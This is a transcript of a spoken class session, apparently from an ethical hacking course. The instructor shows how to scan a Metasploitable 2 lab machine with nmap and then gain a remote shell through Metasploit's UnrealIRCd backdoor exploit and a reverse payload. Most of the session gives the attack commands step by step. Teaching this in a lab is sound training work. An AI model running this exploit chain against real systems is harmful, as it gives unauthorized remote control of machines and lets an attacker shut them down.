This conference will now be recorded.
Student, I am audible. Hello. Okay, so how many of you have tried for Metasploit? Chandana, you were attending, you did not attend for the last 2 3 classes, it seems, right? Chandana, are you there? So before I start proceed the practical, we'll try to understand the step by step what has to be done. This is whatever today I'm conducting is a lab one, system hacking lab one. System hacking lab one. So we'll conduct 2 labs for this. Uh, we will be using a tool called as Metasploit framework, and complete details about Metasploit framework, how does it works, what exactly it is, and what are the prompts, what are the components, then what are the modules. So that and all I explained in the last class. So those who have not attended, so please watch for the previous video, then you can understand what exactly what I'm conducting today. Okay, so today is completely the practical stuff what I'm going to be explaining. Okay, so and we will target. Okay, so our attacking machine and our target machines. Okay, uh, attacking machine, our Kali Linux machine, and our target machine is Metasploitable 2. So these are the two machines, and whatever command I'm going to giving you, that is in the Kali Linux machine. So using Kali Linux machine, we are performing all the stuff. Okay, so you have to execute in your attacking machine. So you have to use attack machine, and inside this attack machine you have to start the commands. Okay, so in the Kali Linux machine you have to open first Metasploit framework. So when you open, then only you can do some of the stuff. But the question is, sir, how do I open? Suppose some people like Chandana assumes that she did not attend it in the last class. She don't know how to open. So if you wanted to open Metasploit framework in the Kali Linux machine or in the attack machine, so you have to use first make ensure open Kali Linux machine, open terminal. So when you open the terminal, you have a prompt like this, Kali @ Kali, and you have $sign. So this is your prompt. Hope you guys, is that correct? If that correct, then you have to type as MSF console. So type MSF console and then you have to press enter key to open MSF Metasploit framework. Okay, so what is a command you will be typing? You will be typing that MSF console. This is a simple command, and the moment if you type MSF console, then you have a one more prompt inside this, that is by the name of MSF 6, MSF 6 and greater than sign. So this is where the prompt is going to change. Okay, you have to notice where prompt has changed. Then from here onwards, you have to start inside this MSF 6. Okay, any unwanted text if you have, it's inside this MSF 6 prompt, then use the command called as clear and press enter key. Then which will completely deleting all the stuff. Then you type in the same prompt, if I want to ping, so type ping -c. In the last class I said that 2 times I wanted to ping, so -c means count. Okay, so 2 times I wanted to have this. Then here 192.168.0.105. Okay, so for our understanding purpose, assumes this this would be our IP address, Metasploit IP address. And whenever you target, then you must have to enter this IP address, Metasploitable IP address. Okay, then press enter key to continue. Next, one more MSF6. So here you type nmap space -s small letter capital letter S, and you target 192.168.0.105. So in your case might be some XYZ IP address, doesn't matter, you target that same IP and enter, no problem. So this is going to be taking list of open port numbers which are available. Next, in the same prompt, again if I want to have nmap space -s capital letter S and -s small letter capital letter V, and target the port number. So the port number, whenever which will be displaying, one of the port number I'm going to take, so 6667. So this is the one which I've taught you in the last class. Okay, and target that whatever port number you want, and take 192.168.0.105. So same IP. So then whenever you type this, this would be displayed what is the service information. So service info displayed. So this has to be remember whenever you type and execute the command. Next MSF6 again you type nmap hyphen o capital letter and you target 192.168.0.105. Okay, then here you have to notice which operating system is running. So this would be displaying running Linux 2.6x, then operating system details. This would get operating system details and also network distance, the distance of the network. Next again MSF6, then in the same prompt you type nmap hyphen s small letter capital letter S hyphen s small letter capital letter V and hyphen P, then 6667 means I'm targeting the port that this is going to be working for the script. Okay, so we'll try to execute the script. Okay, so script vulnerable and put that IP address 192.168.0.105. So this is the basic commands what I've taught you in the last class, it seems. Is it correct? So if you noted or whatever I explained, if that understood, you type it as yes in the chat box. This is the prompt and how do you open and how do you get into the console. Then I will tell you the practically by Kali Linux machine. Using Kali Linux machine, then we'll try to hack the system. Guys, are you there? I'm asking you, is that understood? The basic commands, collecting information from the from the portal and getting the information's resources. Okay, good. Now let's see how that can be executed in our Kali. So make ensure are you in the same area like this is the one last class I was using the same machine. I don't know which number, which IP address I'm going to be getting in this. So first you type IP space address and enter and have a look once what IP address you have got in this. So saying that 192.168.122.179, 192.168.122.179, and again you come back. So state this exit and type clear and enter. Then you type IP space address and press enter key. So I'm getting this IP address now. This is a different IP I'm having now. Okay, this completely different IP, and this would be also a different IP right now. So this is not matching according to me. Okay, so what I will do, I will be restarting the machine because it's not taking the same IP, same network IP. So which is having the different IP. So both the machine must be in the same network. Then only I can do system hacking. If that does not comes to the real time network, then it's going to be a problem. So right now this should be 1.50. Then you check MSF admin, MSF admin, then IP space address. So in this case, could you see what IP address I am having? 192.168.1.51. 1.51. Here also 1.50. So trying to ping. Okay. So 192.168.1.51 and press enter key. So both are having in the same network. Now this time I would like to take two times, only two times ping. Okay, then what I can do according to the steps whatever I've given. So ping space hyphen c space 2, then you type 192.168.1.51 and press enter key. So I would get this time I would get only the two times or two packets are sent to the target machine. Okay, and even I'm also getting the same reply from that machine. So this is the two times sending the hello packets. And next I wanted to check the port numbers. So to check the port number, you have nmap hyphen small letter capital letter S and type 192.168.1.51. So this would be the targeted IP address and press enter key. So now this time this would asking for the root privileges and you type sudo nmap small letter S capital letter S 192.168.1.51 and press enter key. Type Kali and check out what is the number of port numbers. See the port numbers which are running and which are the port numbers are open. So this is displaying how many ports are closed. So right now, except the list of port number, 977 TCP ports are closed. But when I'm scrolling this 21, 22, 23, 25, 53, 80. So these are the port numbers are opened. The status is opened. Okay. And I'm targeting only one port number in this example. So 6667. This is what I targeted in the last class also. So we will continue the same one. IRC means Internet Relay Chart. Okay, so this one is having that vulnerability, and based on that, we will try to get that information what I am having here. Okay, so now service information which are running in the port number 6667. So I wanted to have a complete display of the service information. So then what you supposed to be done? So sudo then nmap, then type small letter S, capital letter S, and again small letter S, capital letter V. So V stands for like versions, okay, and wanted to have a port number here, space hyphen P 6667. So which is we have to specify which port number, then IP address 192.168.1.51 and press enter. And here I can see what is the version which is running, what is the services. Services says said that one IRC and version Unreal IRCD, and this also display the MAC address and service informations like irc.metasploitable.lan. So Metasploitable local area network, and this is going to be displayed the service detections performed, and some more details if you want you can visit on this area. And this is also displaying what is the IP address and hop count between these two areas. Okay, this is the basic information. Next, again, I wanted to see before you attack, I wanted to have a IP, sorry, operating system details. So this is the same thing what I've done. Nmap hyphen O means operating system. Okay, capital letter O, and set this IP address 192.168. State that 1.51 and press it. Okay, so type sudo here and space and press enter key, and look at this operating system what you have running, like Linux 2.6.9. This is your operating system details. So once it is done, then you check what is the network distance also. The network distance is one hop. Okay, so after one computer, then you will be getting the Linux operating system like Metasploitable. Okay, next we'll try to run the script now. So sudo nmap the same command what you have used earlier. So hyphen s capital letter S, then hyphen s capital letter V. So and again port number hyphen p 6667, then double time you type name that as script. Okay, we'll try to execute that script vuln and the IP 192.168.1.51 and press enter. If the script is running, then which will be displaying what is a vulnerable on the port 6667. So sometimes it takes time also. So beautifully it's running. So it is started pre-scan script result after null UDP. So something, did you notice this what I was saying that, hope you guys you are you remembering this what exactly it is? Could you tell me what exactly it is? CVE 2001.1002. So please tell me what is this actually in the WhatsApp chat. Sorry, using chat box. Chandana, Nakshatra, Ujesha, Saida, Ashika, Rida, Kartika, Netravati. CVE something, some number is there, right? Could you tell me what exactly it is? In the vulnerability research, I taught you CVE. CVSS score. The website is called as cvedetails.com. And whenever you type the CVE number 2011 1002 and press enter key, sorry, 1002 2011, you can get the complete details of this area. Vulnerability by type and year since 2015. Okay, you can see this graph. Change this. And even you can go to Google and you type directly that CVE number, and that would tell you. Okay, look at this, where you can get that common vulnerability research. So it's going to be saying that like infinity loop will cause unexpected consumptions of the resources like memory, so on so on, IRC. Okay, so this is the actually a CVE ID. What I was expecting the answer, CVE ID. You can get lot of details here itself. Okay, so tenable.com. Using this here also you can get that complete information. CVSS score and as well as CVE ID number. So CVSS score and CVSS and CVE ID, both the things are most important whenever you search and whenever you run this. Okay, so earlier I got only this much of information, but I did not get CVE number. So to get the CVE number, what you have to run? You have to run this script vulnerable under particular IP. Is it clear, guys? Understood? So if that understood, you type as yes in the chat box. So check the answer here. Up to this much, I got the information. So from here, what is the CVE number I got? CVE 2011 1002. Hope am I correct? This is CVE number. So further more details, you better you search in the Google and you will be getting lot of details in this area. Okay, now once if you successfully searched your CVE number and IRC details, okay, again you continue with the same prompt. So The prompt is again MSF6, and here you search and ask for Unreal IRC. And what has to be done? You have to press enter key. So when you press enter key, which will be displaying the list. Okay, so is that what I can say, the backdoor or what type of vulnerable what it has. Okay, and next you have to find. Okay, so like I wanted to get a same information. So informations like info, and you copy some of the path. Okay, so system is going to give, so exploit Unix, then slash IRC slash Unreal underscore IRCD underscore 3281 underscore saying that backdoor. So this is a complete path. Okay, but whatever I typed here, it is a complete path. But in that machine, what I will do, I will be do copy paste. Okay, then what you have to do, you have to press enter key. When you press enter key, which will give you that information, because I have used the command info. So please remember here, I wanted to get the information about this vulnerability. Okay, and I have searched here. So search is the command where I was searching for Unreal IRC. I'm searching for the exploit. If the exploit is available, then I can get into the next level. Okay, then you type MSF6, then you type only exploit. Exploit. Okay, use the command, and you have Unix IRC because I want to have a payload. Okay, so then Unreal underscore IRCD underscore 3281 underscore backdoor. So whenever you type it, and when you press enter key for the previous one, this would be the output. The prompt is going to be changing. Okay, you will be get enter into this prompt. Prompt means the exploit what you have searched here, that particular exploit it's opened. Okay, so from here onwards, the same prompt you have to use. Clear? Understand, when you press enter key here, then system automatically takes you this same prompt. You will be inside the prompt. From here onwards, you have to enter and you have to ask for any informations what you are looking for. Okay, so from here onwards, you type show options. Okay, so please here, please make ensure which prompt you are in. Okay, so I'll be removing this. I'm not going to use this prompt here. So I'm inside this exploit. Okay, so when you type show options, then you press enter key. When you press enter key, which are going to be display some of the information. So inside that information, you have to set. Okay, so set R host. R host means remote host. Which is the remote host? Our Metasploit IP 192.168, then 1.51. So this is our IP, and you press enter key, then close it. So this must be in the same line. Okay, and again, whenever you whenever you press enter key, I would get same prompt again. Clear? In the same prompt, then you type show options and again press enter key. So once it is done, I'll be making use of the same prompt, and I will be searching for payloads. Okay, so in the last class I explained about what exactly the meaning of what is that exploit and payload. So payload is a piece of code then which is going to perform malicious activities. Okay, suppose if I wanted to delete or something, so on and so on. So I'm going to checking for the list of payloads which are available here. So let's see. Then once it is entered, then what you do, press enter key here. Okay, then whenever you get the list of payload, make ensure I'm going to search for, or I'm looking for the informations about that reverse, means the backdoor. Okay, so you'll be having cmd slash unix slash reverse, then you press enter key. Okay, because it's a exploit where where I would like to get the remote access. So to get the remote access, I supposed to use this exploit. So yeah, exploit, and you have to press enter key. Whenever you press enter key, then you have to execute it. Okay, you have to set the payload. So you write set payload and use the same one what you have used. Okay, but don't forget to press enter key. So whenever you press enter key, then make ensure then you type show options, then you type if config, then press enter key. So whenever you press enter key, then display the IP address. Now from here onwards, you have to set lhost. So this is up to the rhost. Then here you have to set lhost, localhost. Okay. So localhost IP address is 192.168.1.50. This is your Kali Linux machine. Okay, so please remember here, this was 1.51 and this would be 1.50, 192.168.1.50. 1.50 is your L host and 1.51 is your R host. Okay, so in this area you type, press enter key there. Then again from here onwards you type show options. So press again enter key and make is going to be display the port number quad 4 or not. Okay, and also finally you make ensure the command before you to execute exploit. This is the final stage. So whenever you press enter key for exploit, once if you set rhost and lhost, then you have to notice in the bottom of this area command shell session 1 opened. So when you get this, then you are successfully hacked machine. Which machine? Metasploit 2. But there is a question, sir. How do I understand, am I uh, hacked or not? Then use your Linux commands in the same prompt and execute. So are you hacked or not? Example, like you type host name. Whenever you type host name, then system name that would be display. Okay, then you type uname hyphen a pwd. Okay, present working directory, so on so on. Okay, this is the script whatever I've given. Okay, most important here, how do you make use of this vulnerability whatever I've done here inside the port number 6667. I'm making use of this Unreal IRC, and I have to get, am I having this exploit or not? So then when you have this exploit, try to get that information using this info command, then try to use exploit, and are you getting this payload inside this or not, that you check. Okay, if that understood, you type as yes, then we'll try to execute in the practical way. The commands is that understood, where to set lhost and where to set rhost. Lhost means local host, rhost means remote host. In the lhost part, you have to type your Kali Linux IP address. The rhost part, you have to type metasploitable or targeted IP. Okay, so this is the command where I have left here. So here you have to type msf console and press enter key. So now right now I'm in the same prompt. Then you type search Unreal IRC. That I can see what the prompt I'm having as of now. So just do copy. So copy the selection. Okay, whatever you have selected, and you try to use the command info. Okay, then right click and paste. Control Shift V. Okay, this is what I said in the previous one, and press enter key. So right now still I am in the same area. This is a complete informations what I got. Look at this. This is a search result. Then after search result, this is a command I have used. And what is the name? Look at this, backdoor command executions. And module, it is going to be the exploit, and platform is Unix operating system, and the license is Metasploit framework license, so on so on. And ranking is CVSS score is excellent to get that advantages. And look at this, R port, it's already been configured, but I have to set R host. Okay, so set your target host. Okay, whichever particular machine you have, so that you type, the exploit is going to be taking care of, take the advantages of this area. And this is a complete descriptions. Exploits is a malicious backdoor, so that was added to your Unreal IRCD. So download archive. So this is what I said in the malware thread. Okay, and this is the references where you can get some more informations if you want. So make use of this area. Okay, then these are informations you have. Then what you have to do is you have to type exploit. Okay, so exploit, look at this, whatever you have, the same thing again, do copy the selection. Okay, then type. So from where I want, sorry, I want to have from here onwards. I don't want exploit. So exploit is a command as of now. Okay, type exploit and right click and paste. So I have to execute from here onwards. Right click, copy, paste special, press enter key. Say yes. Look at this. So right now I'm inside this prompt. Would you like to use this prompt? Okay, so I have to use the command use. So I've forgotten to set this area. So use exploit. Once it is entered there, so use command show options. So inside this, type show options and press enter key. Look at this. So our host still is empty, means remote host. Still I did not set the target IP. So you type set our host space 192.168.1.51. Is it correct? You check once. Our host 1.51 and you press enter key. And again you type show options. Okay, so look at this. In the previous area, that IP address is not updated, but once if you set that R host and you press enter key, and look at this, IP address has been added. So target host, I'm using inside this exploit the target IP 192.168.1.51. Okay, then again, once if I use that exploit, then I have to search for payloads. Okay, so type show payloads. and press enter key. And look at this, you have so many payloads you have. Okay, but I have to check only that requirement. I want to have reverse, means the back door, like I want to get a remote access whenever I want, whenever the system is going to be switch on, then I don't want to attack again. So whenever the system is going to run, then the same connections must be available. I have to maintain the same access. So that's why I'm checking which are the payloads are available here. Okay, so the sixth one, I guess it's a good one. So look at this. This is the payload. So copy the selection. So then you have to try to take this information. So you, what you do, you type info, then right click and paste. Is this correct? And press enter key and look at this. Now this is asking our host. Okay, and this is about the payload informations. So payload module, Unix, and next you have the current setting is nothing is there in the L host. Okay, and here I wanted to have L host informations, means IP address. I wanted to set the IP address. Sir, I don't know what is my IP address. Okay, so to get this IP address, and you type IP space address and enter, and here you can get what IP address you have now. Okay, so 192.168.1.50. Okay, then you type set L host and make use of this 192.168.1.50 and press enter key. So set L host and press enter key. Then you type show options, enter. Or host you have. Okay, sorry. One more time. Show payload, then info, copy selection, paste, press enter key, then set L host 192.168.1.50, press enter key, show options, press enter key. Now you can see R host and as well as L host. Now this been configured. It's correct. Okay. Check did I make any mistakes. Okay, so set payload. So where I'm making mistake, set the payload, press enter key. Now you type show options, show options, yes. I can get this information as of now. Okay. Now this is the last final area, that is our exploit. Only simply you type exploit, make ensure that spelling everything is correct or not. Then you press enter key. So now it is targeted and connections is connected. Then finally I would like to get one session is opened. Look at this, session 1 is opened, and this is your Kali Linux machine. This is your metasploitable machine. Okay, then you are hacked actually. Okay, now let's see host name. If you type host name, so saying that your computer name metasploitable, then you type pwd means present working directory. Look at this, and you type ip space address, enter. That you can see what is the ip address you have here. Clear? Understand? Now I wanted to switch off this, then you simply type power off and press enter key. Then when you run power off from this machine and try to change, look at this, system is shutting down. So from the Kali machine, now it's completely turned off, but still I have a connections. Okay, again if I turn on, so system is restarted. Now again user will try to log in the machine. Whenever he attempted after the credentials, so type msf admin, again msf admin, press enter key. Okay, and again you come back to your Kali Linux. Okay, and you type again host name, so saying that session was closed. Again what you do, you type exploit, enter. Now you type host name, then pwd ip space address. Look at this, and again what I will do, power off. Even you can create directory so and so on. Then it started shutting down. Hope you guys the lab is understood, the lab 1. If that understood, you type as yes in the chat box. How to hack machine, metasploitable machine, the targeted machine. Jesha, Kartika, okay. What about Yuvraj, Arti, Aditya, Netravati, Ashika, Sayed, Rida, Nakshatra? Okay, so now I'll give 10 to 15 minutes of time. So try to execute the same command on your machine and get me the report. Okay, I'll give you the complete In the WhatsApp, I will share you this details. Just you go through this and try to execute this. Whatever I've shown you now, so immediately start execute the same command and let me know the result. Check out your WhatsApp and even in the chat box also I have sent you that. So part by part I am sending you. So part 1, then part 2. I'm making this 3 times, splitting this entire list of the command. So make use of this and immediately test on your Metasploit and you tell me before I proceed for the next lab number 2. If that successfully, if you executed and get the result, then I can go for the second lab in the same machine. Make it fast and share me the screenshot. Okay. Send me the result. What you got? Sayada is present. Ashika present. Netravati present. Kartika present. Rida and Yuvraj present. Arati Aditya Nakshatra. Yukta absent. Faraz absent. Adiba absent. Monica absent. Okay. On 4th, you will be having exam. So, parallelly, you prepare for the topics whatever I've done since day one. Since IP address topic onwards, you'll be having multiple choice questions.
Sir, on 4th, we have an exam from 7 p.m. to 8 p.m.
Which exam? Huh?
Constitutional rights.
Constitutional right. Okay. Then once you discuss with our madam, okay, like coordinator madam, we'll see how we can do best.
Okay, sir.
Hmm? But
This conference will now be recorded.
So you have BBA students having midterm. Okay. So anyhow, which will not affect for evening, right? And also for the exam. So our exams we will keep only in the 6 to 7, 7:30 to 6:30 to 7:30, like that. We will make you that engage within 1 hour. Then we will complete the task. Okay. So see you guys. We'll meet you in the next class. Fine.